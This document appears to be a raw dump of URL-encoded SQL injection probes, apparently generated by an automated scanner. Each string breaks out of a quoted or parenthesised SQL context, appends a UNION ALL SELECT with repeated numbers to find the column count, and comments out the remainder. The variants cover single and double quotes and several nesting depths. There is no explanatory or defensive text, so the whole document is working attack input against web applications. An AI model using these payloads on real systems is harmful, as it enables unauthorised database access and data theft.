-1910%27%29%29%20UNION%20ALL%20SELECT%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%2C%201204%23%20AND%20%28%28%27BjNE%27%3D%27BjNE -3498%27%29%29%29%20UNION%20ALL%20SELECT%205209%2C%205209%2C%205209%2C%205209%2C%205209%2C%205209%2C%205209%2C%205209%2C%205209%2C%205209%2C%205209%23%20AND%20%28%28%28%27DtXn%27%3D%27DtXn -8356%27%29%29%29%20UNION%20ALL%20SELECT%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%2C%207619%23%20AND%20%28%28%28%27ZGvK%27%3D%27ZGvK -3536%27%29%29%29%20UNION%20ALL%20SELECT%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%23%20AND%20%28%28%28%27cgNY%27%3D%27cgNY -7312%27%29%29%29%20UNION%20ALL%20SELECT%204879%2C%204879%2C%204879%2C%204879%2C%204879%2C%204879%2C%204879%2C%204879%2C%204879%2C%204879%2C%204879%2C%204879%2C%204879%2C%204879%23%20AND%20%28%28%28%27WPuv%27%3D%27WPuv -3803%27%29%29%29%20UNION%20ALL%20SELECT%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%23%20AND%20%28%28%28%27OKCx%27%3D%27OKCx -1537%27%29%29%29%20UNION%20ALL%20SELECT%205007%2C%205007%2C%205007%2C%205007%2C%205007%2C%205007%2C%205007%2C%205007%2C%205007%2C%205007%2C%205007%2C%205007%2C%205007%2C%205007%2C%205007%2C%205007%23%20AND%20%28%28%28%27Leqg%27%3D%27Leqg -9014%27%29%29%29%20UNION%20ALL%20SELECT%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%23%20AND%20%28%28%28%27kugH%27%3D%27kugH -8581%27%29%29%29%20UNION%20ALL%20SELECT%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%23%20AND%20%28%28%28%27LQlk%27%3D%27LQlk -5305%27%29%29%29%20UNION%20ALL%20SELECT%206859%2C%206859%2C%206859%2C%206859%2C%206859%2C%206859%2C%206859%2C%206859%2C%206859%2C%206859%2C%206859%2C%206859%2C%206859%2C%206859%2C%206859%2C%206859%2C%206859%2C%206859%2C%206859%23%20AND%20%28%28%28%27KDvy%27%3D%27KDvy -9616%27%29%29%29%20UNION%20ALL%20SELECT%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%2C%201266%23%20AND%20%28%28%28%27raSB%27%3D%27raSB -9357%27%20UNION%20ALL%20SELECT%208486%2C%208486%2C%208486%2C%208486%2C%208486%2C%208486%2C%208486%2C%208486%2C%208486%2C%208486%2C%208486%23%20AND%20%27UqaU%27%3D%27UqaU -5281%27%20UNION%20ALL%20SELECT%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%23%20AND%20%27cfBW%27%3D%27cfBW -9552%27%20UNION%20ALL%20SELECT%205676%2C%205676%2C%205676%2C%205676%2C%205676%2C%205676%2C%205676%2C%205676%2C%205676%2C%205676%2C%205676%2C%205676%2C%205676%23%20AND%20%27KeSO%27%3D%27KeSO -3985%27%20UNION%20ALL%20SELECT%205267%2C%205267%2C%205267%2C%205267%2C%205267%2C%205267%2C%205267%2C%205267%2C%205267%2C%205267%2C%205267%2C%205267%2C%205267%2C%205267%23%20AND%20%27hKYO%27%3D%27hKYO -8951%27%20UNION%20ALL%20SELECT%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%23%20AND%20%27NzjM%27%3D%27NzjM -3690%27%20UNION%20ALL%20SELECT%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%2C%207436%23%20AND%20%27Qlca%27%3D%27Qlca -1972%27%20UNION%20ALL%20SELECT%206194%2C%206194%2C%206194%2C%206194%2C%206194%2C%206194%2C%206194%2C%206194%2C%206194%2C%206194%2C%206194%2C%206194%2C%206194%2C%206194%2C%206194%2C%206194%2C%206194%23%20AND%20%27dfuY%27%3D%27dfuY -4746%27%20UNION%20ALL%20SELECT%207859%2C%207859%2C%207859%2C%207859%2C%207859%2C%207859%2C%207859%2C%207859%2C%207859%2C%207859%2C%207859%2C%207859%2C%207859%2C%207859%2C%207859%2C%207859%2C%207859%2C%207859%23%20AND%20%27nHoK%27%3D%27nHoK -6545%27%20UNION%20ALL%20SELECT%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%23%20AND%20%27gKMt%27%3D%27gKMt -5515%27%20UNION%20ALL%20SELECT%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%2C%208087%23%20AND%20%27DiKA%27%3D%27DiKA -1223%27%29%20UNION%20ALL%20SELECT%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%23%20AND%20%28%27eeaf%27%20LIKE%20%27eeaf -8976%27%29%20UNION%20ALL%20SELECT%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%23%20AND%20%28%27RsbL%27%20LIKE%20%27RsbL -6714%27%29%20UNION%20ALL%20SELECT%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%23%20AND%20%28%27EzDd%27%20LIKE%20%27EzDd -3595%27%29%20UNION%20ALL%20SELECT%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%23%20AND%20%28%27OeoC%27%20LIKE%20%27OeoC -6260%27%29%20UNION%20ALL%20SELECT%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%23%20AND%20%28%27nIZp%27%20LIKE%20%27nIZp -8880%27%29%20UNION%20ALL%20SELECT%207719%2C%207719%2C%207719%2C%207719%2C%207719%2C%207719%2C%207719%2C%207719%2C%207719%2C%207719%2C%207719%2C%207719%2C%207719%2C%207719%2C%207719%2C%207719%23%20AND%20%28%27ojtb%27%20LIKE%20%27ojtb -3683%27%29%20UNION%20ALL%20SELECT%204300%2C%204300%2C%204300%2C%204300%2C%204300%2C%204300%2C%204300%2C%204300%2C%204300%2C%204300%2C%204300%2C%204300%2C%204300%2C%204300%2C%204300%2C%204300%2C%204300%23%20AND%20%28%27YkJT%27%20LIKE%20%27YkJT -5881%27%29%20UNION%20ALL%20SELECT%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%23%20AND%20%28%27KaBW%27%20LIKE%20%27KaBW -7052%27%29%20UNION%20ALL%20SELECT%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%23%20AND%20%28%27sOMD%27%20LIKE%20%27sOMD -7107%27%29%20UNION%20ALL%20SELECT%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%2C%206639%23%20AND%20%28%27COjj%27%20LIKE%20%27COjj -1883%27%29%29%20UNION%20ALL%20SELECT%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%23%20AND%20%28%28%27ijZd%27%20LIKE%20%27ijZd -1413%27%29%29%20UNION%20ALL%20SELECT%207697%2C%207697%2C%207697%2C%207697%2C%207697%2C%207697%2C%207697%2C%207697%2C%207697%2C%207697%2C%207697%2C%207697%23%20AND%20%28%28%27OKHu%27%20LIKE%20%27OKHu -7370%27%29%29%20UNION%20ALL%20SELECT%209637%2C%209637%2C%209637%2C%209637%2C%209637%2C%209637%2C%209637%2C%209637%2C%209637%2C%209637%2C%209637%2C%209637%2C%209637%23%20AND%20%28%28%27CqtH%27%20LIKE%20%27CqtH -1845%27%29%29%20UNION%20ALL%20SELECT%202999%2C%202999%2C%202999%2C%202999%2C%202999%2C%202999%2C%202999%2C%202999%2C%202999%2C%202999%2C%202999%2C%202999%2C%202999%2C%202999%23%20AND%20%28%28%27JnTY%27%20LIKE%20%27JnTY -2527%27%29%29%20UNION%20ALL%20SELECT%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%23%20AND%20%28%28%27gtun%27%20LIKE%20%27gtun -2301%27%29%29%20UNION%20ALL%20SELECT%204993%2C%204993%2C%204993%2C%204993%2C%204993%2C%204993%2C%204993%2C%204993%2C%204993%2C%204993%2C%204993%2C%204993%2C%204993%2C%204993%2C%204993%2C%204993%23%20AND%20%28%28%27yIlY%27%20LIKE%20%27yIlY -9986%27%29%29%20UNION%20ALL%20SELECT%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%23%20AND%20%28%28%27lmOe%27%20LIKE%20%27lmOe -3359%27%29%29%20UNION%20ALL%20SELECT%207441%2C%207441%2C%207441%2C%207441%2C%207441%2C%207441%2C%207441%2C%207441%2C%207441%2C%207441%2C%207441%2C%207441%2C%207441%2C%207441%2C%207441%2C%207441%2C%207441%2C%207441%23%20AND%20%28%28%27aqRj%27%20LIKE%20%27aqRj -2391%27%29%29%20UNION%20ALL%20SELECT%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%23%20AND%20%28%28%27UBrf%27%20LIKE%20%27UBrf -1801%27%29%29%20UNION%20ALL%20SELECT%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%23%20AND%20%28%28%27YRho%27%20LIKE%20%27YRho -1319%27%29%29%29%20UNION%20ALL%20SELECT%206824%2C%206824%2C%206824%2C%206824%2C%206824%2C%206824%2C%206824%2C%206824%2C%206824%2C%206824%2C%206824%23%20AND%20%28%28%28%27FuPM%27%20LIKE%20%27FuPM -2297%27%29%29%29%20UNION%20ALL%20SELECT%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%23%20AND%20%28%28%28%27ClVK%27%20LIKE%20%27ClVK -4105%27%29%29%29%20UNION%20ALL%20SELECT%205551%2C%205551%2C%205551%2C%205551%2C%205551%2C%205551%2C%205551%2C%205551%2C%205551%2C%205551%2C%205551%2C%205551%2C%205551%23%20AND%20%28%28%28%27JtFi%27%20LIKE%20%27JtFi -8406%27%29%29%29%20UNION%20ALL%20SELECT%202640%2C%202640%2C%202640%2C%202640%2C%202640%2C%202640%2C%202640%2C%202640%2C%202640%2C%202640%2C%202640%2C%202640%2C%202640%2C%202640%23%20AND%20%28%28%28%27VLtX%27%20LIKE%20%27VLtX -7656%27%29%29%29%20UNION%20ALL%20SELECT%208918%2C%208918%2C%208918%2C%208918%2C%208918%2C%208918%2C%208918%2C%208918%2C%208918%2C%208918%2C%208918%2C%208918%2C%208918%2C%208918%2C%208918%23%20AND%20%28%28%28%27GZJD%27%20LIKE%20%27GZJD -5524%27%29%29%29%20UNION%20ALL%20SELECT%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%23%20AND%20%28%28%28%27PFTW%27%20LIKE%20%27PFTW -6678%27%29%29%29%20UNION%20ALL%20SELECT%202525%2C%202525%2C%202525%2C%202525%2C%202525%2C%202525%2C%202525%2C%202525%2C%202525%2C%202525%2C%202525%2C%202525%2C%202525%2C%202525%2C%202525%2C%202525%2C%202525%23%20AND%20%28%28%28%27MmNX%27%20LIKE%20%27MmNX -5463%27%29%29%29%20UNION%20ALL%20SELECT%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%23%20AND%20%28%28%28%27MCsy%27%20LIKE%20%27MCsy -4645%27%29%29%29%20UNION%20ALL%20SELECT%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%23%20AND%20%28%28%28%27Noli%27%20LIKE%20%27Noli -7543%27%29%29%29%20UNION%20ALL%20SELECT%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%23%20AND%20%28%28%28%27YBDE%27%20LIKE%20%27YBDE -9210%27%20UNION%20ALL%20SELECT%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%23%20AND%20%27Sfup%27%20LIKE%20%27Sfup -5634%27%20UNION%20ALL%20SELECT%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%23%20AND%20%27YsJJ%27%20LIKE%20%27YsJJ -2809%27%20UNION%20ALL%20SELECT%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%23%20AND%20%27TzrQ%27%20LIKE%20%27TzrQ -9290%27%20UNION%20ALL%20SELECT%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%23%20AND%20%27TeVw%27%20LIKE%20%27TeVw -7713%27%20UNION%20ALL%20SELECT%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%23%20AND%20%27PbUk%27%20LIKE%20%27PbUk -3399%27%20UNION%20ALL%20SELECT%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%23%20AND%20%27jsGx%27%20LIKE%20%27jsGx -5481%27%20UNION%20ALL%20SELECT%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%23%20AND%20%27MiIB%27%20LIKE%20%27MiIB -4175%27%20UNION%20ALL%20SELECT%201147%2C%201147%2C%201147%2C%201147%2C%201147%2C%201147%2C%201147%2C%201147%2C%201147%2C%201147%2C%201147%2C%201147%2C%201147%2C%201147%2C%201147%2C%201147%2C%201147%2C%201147%23%20AND%20%27sGdU%27%20LIKE%20%27sGdU -7660%27%20UNION%20ALL%20SELECT%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%23%20AND%20%27NQLq%27%20LIKE%20%27NQLq -7826%27%20UNION%20ALL%20SELECT%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%2C%208692%23%20AND%20%27oNKV%27%20LIKE%20%27oNKV -9455%22%29%20UNION%20ALL%20SELECT%209966%2C%209966%2C%209966%2C%209966%2C%209966%2C%209966%2C%209966%2C%209966%2C%209966%2C%209966%2C%209966%23%20AND%20%28%22gBNl%22%3D%22gBNl -9421%22%29%20UNION%20ALL%20SELECT%201586%2C%201586%2C%201586%2C%201586%2C%201586%2C%201586%2C%201586%2C%201586%2C%201586%2C%201586%2C%201586%2C%201586%23%20AND%20%28%22Ryjb%22%3D%22Ryjb -7294%22%29%20UNION%20ALL%20SELECT%207544%2C%207544%2C%207544%2C%207544%2C%207544%2C%207544%2C%207544%2C%207544%2C%207544%2C%207544%2C%207544%2C%207544%2C%207544%23%20AND%20%28%22pRSR%22%3D%22pRSR -2392%22%29%20UNION%20ALL%20SELECT%207289%2C%207289%2C%207289%2C%207289%2C%207289%2C%207289%2C%207289%2C%207289%2C%207289%2C%207289%2C%207289%2C%207289%2C%207289%2C%207289%23%20AND%20%28%22kacg%22%3D%22kacg -4686%22%29%20UNION%20ALL%20SELECT%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%23%20AND%20%28%22kCfU%22%3D%22kCfU -1871%22%29%20UNION%20ALL%20SELECT%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%23%20AND%20%28%22Didx%22%3D%22Didx -3636%22%29%20UNION%20ALL%20SELECT%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%23%20AND%20%28%22AtXU%22%3D%22AtXU -3448%22%29%20UNION%20ALL%20SELECT%203298%2C%203298%2C%203298%2C%203298%2C%203298%2C%203298%2C%203298%2C%203298%2C%203298%2C%203298%2C%203298%2C%203298%2C%203298%2C%203298%2C%203298%2C%203298%2C%203298%2C%203298%23%20AND%20%28%22qrSE%22%3D%22qrSE -1719%22%29%20UNION%20ALL%20SELECT%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%23%20AND%20%28%22beKF%22%3D%22beKF -9427%22%29%20UNION%20ALL%20SELECT%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%2C%206800%23%20AND%20%28%22KZqQ%22%3D%22KZqQ -4731%22%29%29%20UNION%20ALL%20SELECT%204402%2C%204402%2C%204402%2C%204402%2C%204402%2C%204402%2C%204402%2C%204402%2C%204402%2C%204402%2C%204402%23%20AND%20%28%28%22zXsi%22%3D%22zXsi -5017%22%29%29%20UNION%20ALL%20SELECT%206479%2C%206479%2C%206479%2C%206479%2C%206479%2C%206479%2C%206479%2C%206479%2C%206479%2C%206479%2C%206479%2C%206479%23%20AND%20%28%28%22eLga%22%3D%22eLga -3236%22%29%29%20UNION%20ALL%20SELECT%207623%2C%207623%2C%207623%2C%207623%2C%207623%2C%207623%2C%207623%2C%207623%2C%207623%2C%207623%2C%207623%2C%207623%2C%207623%23%20AND%20%28%28%22GNWs%22%3D%22GNWs -2091%22%29%29%20UNION%20ALL%20SELECT%207512%2C%207512%2C%207512%2C%207512%2C%207512%2C%207512%2C%207512%2C%207512%2C%207512%2C%207512%2C%207512%2C%207512%2C%207512%2C%207512%23%20AND%20%28%28%22wRsd%22%3D%22wRsd -5255%22%29%29%20UNION%20ALL%20SELECT%204818%2C%204818%2C%204818%2C%204818%2C%204818%2C%204818%2C%204818%2C%204818%2C%204818%2C%204818%2C%204818%2C%204818%2C%204818%2C%204818%2C%204818%23%20AND%20%28%28%22sirP%22%3D%22sirP -9102%22%29%29%20UNION%20ALL%20SELECT%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%23%20AND%20%28%28%22pWNi%22%3D%22pWNi -4951%22%29%29%20UNION%20ALL%20SELECT%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%23%20AND%20%28%28%22WgWI%22%3D%22WgWI -6159%22%29%29%20UNION%20ALL%20SELECT%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%2C%204642%23%20AND%20%28%28%22HtjH%22%3D%22HtjH -8942%22%29%29%20UNION%20ALL%20SELECT%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%23%20AND%20%28%28%22zqDH%22%3D%22zqDH -4964%22%29%29%20UNION%20ALL%20SELECT%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%2C%204922%23%20AND%20%28%28%22Xixn%22%3D%22Xixn -6405%22%29%29%29%20UNION%20ALL%20SELECT%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%2C%208168%23%20AND%20%28%28%28%22desN%22%3D%22desN -6211%22%29%29%29%20UNION%20ALL%20SELECT%208384%2C%208384%2C%208384%2C%208384%2C%208384%2C%208384%2C%208384%2C%208384%2C%208384%2C%208384%2C%208384%2C%208384%23%20AND%20%28%28%28%22Gljw%22%3D%22Gljw -4063%22%29%29%29%20UNION%20ALL%20SELECT%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%2C%201200%23%20AND%20%28%28%28%22CDRf%22%3D%22CDRf -7773%22%29%29%29%20UNION%20ALL%20SELECT%201888%2C%201888%2C%201888%2C%201888%2C%201888%2C%201888%2C%201888%2C%201888%2C%201888%2C%201888%2C%201888%2C%201888%2C%201888%2C%201888%23%20AND%20%28%28%28%22QWjK%22%3D%22QWjK -2542%22%29%29%29%20UNION%20ALL%20SELECT%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%2C%206506%23%20AND%20%28%28%28%22fXnd%22%3D%22fXnd -1814%22%29%29%29%20UNION%20ALL%20SELECT%201895%2C%201895%2C%201895%2C%201895%2C%201895%2C%201895%2C%201895%2C%201895%2C%201895%2C%201895%2C%201895%2C%201895%2C%201895%2C%201895%2C%201895%2C%201895%23%20AND%20%28%28%28%22lKbv%22%3D%22lKbv -8730%22%29%29%29%20UNION%20ALL%20SELECT%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%23%20AND%20%28%28%28%22uYDM%22%3D%22uYDM -8184%22%29%29%29%20UNION%20ALL%20SELECT%206379%2C%206379%2C%206379%2C%206379%2C%206379%2C%206379%2C%206379%2C%206379%2C%206379%2C%206379%2C%206379%2C%206379%2C%206379%2C%206379%2C%206379%2C%206379%2C%206379%2C%206379%23%20AND%20%28%28%28%22LVRz%22%3D%22LVRz -6662%22%29%29%29%20UNION%20ALL%20SELECT%206842%2C%206842%2C%206842%2C%206842%2C%206842%2C%206842%2C%206842%2C%206842%2C%206842%2C%206842%2C%206842%2C%206842%2C%206842%2C%206842%2C%206842%2C%206842%2C%206842%2C%206842%2C%206842%23%20AND%20%28%28%28%22Ylee%22%3D%22Ylee -7163%22%29%29%29%20UNION%20ALL%20SELECT%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%23%20AND%20%28%28%28%22XTDZ%22%3D%22XTDZ -6292%22%20UNION%20ALL%20SELECT%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%23%20AND%20%22EZba%22%3D%22EZba -2585%22%20UNION%20ALL%20SELECT%204641%2C%204641%2C%204641%2C%204641%2C%204641%2C%204641%2C%204641%2C%204641%2C%204641%2C%204641%2C%204641%2C%204641%23%20AND%20%22UmOZ%22%3D%22UmOZ -8626%22%20UNION%20ALL%20SELECT%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%23%20AND%20%22Ogsc%22%3D%22Ogsc -4068%22%20UNION%20ALL%20SELECT%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%23%20AND%20%22eslj%22%3D%22eslj -5788%22%20UNION%20ALL%20SELECT%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%2C%202712%23%20AND%20%22vDwf%22%3D%22vDwf -2799%22%20UNION%20ALL%20SELECT%204914%2C%204914%2C%204914%2C%204914%2C%204914%2C%204914%2C%204914%2C%204914%2C%204914%2C%204914%2C%204914%2C%204914%2C%204914%2C%204914%2C%204914%2C%204914%23%20AND%20%22ORjO%22%3D%22ORjO -7830%22%20UNION%20ALL%20SELECT%201612%2C%201612%2C%201612%2C%201612%2C%201612%2C%201612%2C%201612%2C%201612%2C%201612%2C%201612%2C%201612%2C%201612%2C%201612%2C%201612%2C%201612%2C%201612%2C%201612%23%20AND%20%22oLQk%22%3D%22oLQk -9846%22%20UNION%20ALL%20SELECT%206528%2C%206528%2C%206528%2C%206528%2C%206528%2C%206528%2C%206528%2C%206528%2C%206528%2C%206528%2C%206528%2C%206528%2C%206528%2C%206528%2C%206528%2C%206528%2C%206528%2C%206528%23%20AND%20%22ANWh%22%3D%22ANWh -2239%22%20UNION%20ALL%20SELECT%205452%2C%205452%2C%205452%2C%205452%2C%205452%2C%205452%2C%205452%2C%205452%2C%205452%2C%205452%2C%205452%2C%205452%2C%205452%2C%205452%2C%205452%2C%205452%2C%205452%2C%205452%2C%205452%23%20AND%20%22LQpM%22%3D%22LQpM -9436%22%20UNION%20ALL%20SELECT%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%23%20AND%20%22ZOip%22%3D%22ZOip -5505%22%29%20UNION%20ALL%20SELECT%202196%2C%202196%2C%202196%2C%202196%2C%202196%2C%202196%2C%202196%2C%202196%2C%202196%2C%202196%2C%202196%23%20AND%20%28%22TLTs%22%20LIKE%20%22TLTs -6036%22%29%20UNION%20ALL%20SELECT%203858%2C%203858%2C%203858%2C%203858%2C%203858%2C%203858%2C%203858%2C%203858%2C%203858%2C%203858%2C%203858%2C%203858%23%20AND%20%28%22YfYE%22%20LIKE%20%22YfYE -8455%22%29%20UNION%20ALL%20SELECT%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%23%20AND%20%28%22SKqY%22%20LIKE%20%22SKqY 